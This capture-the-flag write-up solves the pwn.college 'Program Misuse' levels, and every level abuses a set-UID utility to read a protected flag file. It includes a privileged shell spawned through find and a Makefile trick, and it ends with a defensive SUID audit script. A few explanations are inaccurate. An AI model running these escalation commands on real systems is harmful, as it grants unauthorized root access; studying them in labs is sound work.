Program Misuse
level 1
I just set the SUID bit on /usr/bin/cat.
Try to use it to read the flag!
We can just cat the flag.
hacker@program-misuse~level1:/$ cat /flag
level 2
I just set the SUID bit on /usr/bin/more.
Try to use it to read the flag!
The more utility is used to view text files in the command prompt, displaying one screen at a time in case the file is large.
hacker@program-misuse~level2:/$ more /flag
level 3
I just set the SUID bit on /usr/bin/less.
Try to use it to read the flag!
hacker@program-misuse~level3:/$ less /flag
level 4
I just set the SUID bit on /usr/bin/tail.
Try to use it to read the flag!
hacker@program-misuse~level4:/$ tail /flag
level 5
I just set the SUID bit on /usr/bin/head.
Try to use it to read the flag!
hacker@program-misuse~level5:/$ head /flag
level 6
I just set the SUID bit on /usr/bin/sort.
Try to use it to read the flag!
hacker@program-misuse~level6:/$ sort /flag
level 7
I just set the SUID bit on /usr/bin/vim.
Try to use it to read the flag!
hacker@program-misuse~level7:/$ vim /flag
level 8
I just set the SUID bit on /usr/bin/emacs.
Try to use it to read the flag!
hacker@program-misuse~level8:/$ emacs /flag
level 9
I just set the SUID bit on /usr/bin/nano.
Try to use it to read the flag!
hacker@program-misuse~level9:/$ nano /flag
level 10
I just set the SUID bit on /usr/bin/rev.
Try to use it to read the flag!
The rev utility reverses the order of characters within a file.
hacker@program-misuse~level10:/$ rev /flag
The flag is reversed. To get the flag in the correct order, we have to pipe the output of the above command into another rev.
hacker@program-misuse~level10:/$ rev /flag | rev
level 11
I just set the SUID bit on /usr/bin/od.
Try to use it to read the flag!
The od utility gives an octal dump of the data provided through STDIN.
If we provide the -c option, od will dump the ASCII representation.
hacker@program-misuse~level11:/$ od -c /flag
level 12
I just set the SUID bit on /usr/bin/hd.
Try to use it to read the flag!
The hd utility gives a hexadecimal dump of the data provided through STDIN.
hacker@program-misuse~level12:/$ hd /flag
level 13
I just set the SUID bit on /usr/bin/xxd.
Try to use it to read the flag!
The xxd utility creates a hex dump of the input provided through STDIN.
hacker@program-misuse~level13:/$ xxd /flag
level 14
I just set the SUID bit on /usr/bin/base32.
Try to use it to read the flag!
The base32 utility can be used to Base32 encode or decode data.
hacker@program-misuse~level14:/$ base32 /flag
This prints the Base32 encoded flag string.
We can decode this string using the -d option.
hacker@program-misuse~level14:/$ base32 /flag | base32 -d
level 15
I just set the SUID bit on /usr/bin/base64.
Try to use it to read the flag!
The base64 utility can be used to Base64 encode or decode data.
hacker@program-misuse~level15:/$ base64 /flag
This prints the Base64 encoded flag string.
We can decode the string using the -d option.
hacker@program-misuse~level15:/$ base64 /flag | base64 -d
level 16
I just set the SUID bit on /usr/bin/split.
Try to use it to read the flag!
The split utility splits the given data based on the buffer size that is set.
The -x option prints an unbuffered stream of data.
hacker@program-misuse~level16:~$ split -x /flag
This prints the flag into a file xaa (could be different on your end).
hacker@program-misuse~level16:~$ cat xaa
level 17
I just set the SUID bit on /usr/bin/gzip.
Try to use it to read the flag!
The gzip utility compresses the file provided to it using Lempel-Ziv coding.
hacker@program-misuse~level17:/$ gzip /flag
We can use the -d option to decompress the flag.gz file. Also, we can use the -c option to print its content to STDOUT.
hacker@program-misuse~level17:/$ gzip -c -d /flag.gz
level 18
I just set the SUID bit on /usr/bin/bzip2.
Try to use it to read the flag!
The bzip2 utility compresses files using the Burrows-Wheeler block sorting text compression algorithm, and Huffman coding.
We can use the -c option to print its content to STDOUT. Also, we can use the -d option to decompress the flag.gz file.
hacker@program-misuse~level18:/$ bzip2 -c /flag | bzip2 -d
level 19
I just set the SUID bit on /usr/bin/zip.
Try to use it to read the flag!
zip is a compression and file packaging utility for Unix, VMS, MSDOS, OS/2, Windows 9x/NT/XP, Minix, Atari, Macintosh, Amiga, and Acorn RISC OS.
In order to use it, we have to specify a destination file as well.
hacker@program-misuse~level19:/$ zip /flag.zip /flag && cat /flag.zip
level 20
I just set the SUID bit on /usr/bin/tar.
Try to use it to read the flag!
The tar utility is an archiving program designed to store multiple files in a single file (an archive), and to manipulate such archives.
hacker@program-misuse~level20:/$ tar -cvf flag.tar /flag && cat flag.tar
level 21
I just set the SUID bit on /usr/bin/ar.
Try to use it to read the flag!
The ar program creates, modifies, and extracts from archives.
We can specify the output file using the r option.
hacker@program-misuse~level21:/$ ar r /flag.a /flag && cat /flag.a
level 22
I just set the SUID bit on /usr/bin/cpio.
Try to use it to read the flag!
The cpio utility can copy files between archives.
We can use the find command for the /flag, pipe it with cpio and redirect the output to the flag.cpio file.
hacker@program-misuse~level22:~$ find /flag | cpio -o > flag.cpio && cat flag.cpio
level 23
I just set the SUID bit on /usr/bin/genisoimage.
Try to use it to read the flag!
The genisoimage utility creates filesystem images.
In order to retrieve the flag, we have to use the following script:
hacker@program-misuse~level23:/$ for option in $(genisoimage --help 2>&1 | grep FILE | awk {'print $1'}); do echo $option; genisoimage $option /flag 2>&1 | grep pwn; done
level 24
I just set the SUID bit on /usr/bin/env.
Try to use it to read the flag!
The env utility sets the environment for another command.
We can pair it with cat to read the flag.
hacker@program-misuse~level24:/$ env cat /flag
level 25
I just set the SUID bit on /usr/bin/find.
Try to use it to read the flag!
hacker@program-misuse~level25:~$ find . -exec /bin/sh -p \;
#
# cat /flag
cat: /flagcat: No such file or directory
pwn.college{UsQ6vfq4dFoZ1Q5jlesvmOxUwqA.01N2EDL4ITM0EzW}
level 26
I just set the SUID bit on /usr/bin/make.
Try to use it to read the flag!
The make utility will determine automatically which pieces of a large program need to be recompiled, and issue the commands to recompile them.
Any command we specify within the Makefile is executed.
all:
	cat /flag
In order to execute the Makefile, we have to run the make command in the same directory as the file.
hacker@program-misuse~level26:~$ make
level 27
I just set the SUID bit on /usr/bin/nice.
Try to use it to read the flag!
The nice utility can be used to adjust the process scheduling.
hacker@program-misuse~level27:/$ nice cat /flag
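Seen from the defender's side, every level above depends on the same misconfiguration: a general-purpose utility carrying the set-UID bit. The audit script below is an added example, not part of the original write-up; the function name audit_suid and the RISKY/REVIEW labels are assumptions made for illustration, and the name list is simply the utilities used on this page.

```shell
#!/bin/sh
# Added example: report set-UID files under the given directories and mark
# those whose name matches a utility from the levels above. These tools read
# a file or run a command chosen by the caller, so they should never be set-UID.

# Names taken from this page (levels 1-27).
RISKY_SUID="cat more less tail head sort vim emacs nano rev od hd xxd base32 \
base64 split gzip bzip2 zip tar ar cpio genisoimage env find make nice"

# audit_suid DIR...
# Prints "RISKY <path>" for set-UID files named in RISKY_SUID and
# "REVIEW <path>" for any other set-UID file (compare those against the
# distribution's expected list). Returns 1 if at least one RISKY file exists.
audit_suid() {
    found=0
    # -perm -4000 matches files with the set-UID bit; -xdev stays on one filesystem.
    list=$(find "$@" -xdev -type f -perm -4000 2>/dev/null | sort)
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        case " $RISKY_SUID " in
            *" $name "*)
                echo "RISKY $path"
                found=1
                ;;
            *)
                echo "REVIEW $path"
                ;;
        esac
    done <<EOF
$list
EOF
    return "$found"
}

# Usage: sh audit_suid.sh /usr/bin /usr/local/bin
# A RISKY hit is fixed by clearing the bit as root: chmod u-s <path>
if [ "$#" -gt 0 ]; then
    audit_suid "$@"
fi
```
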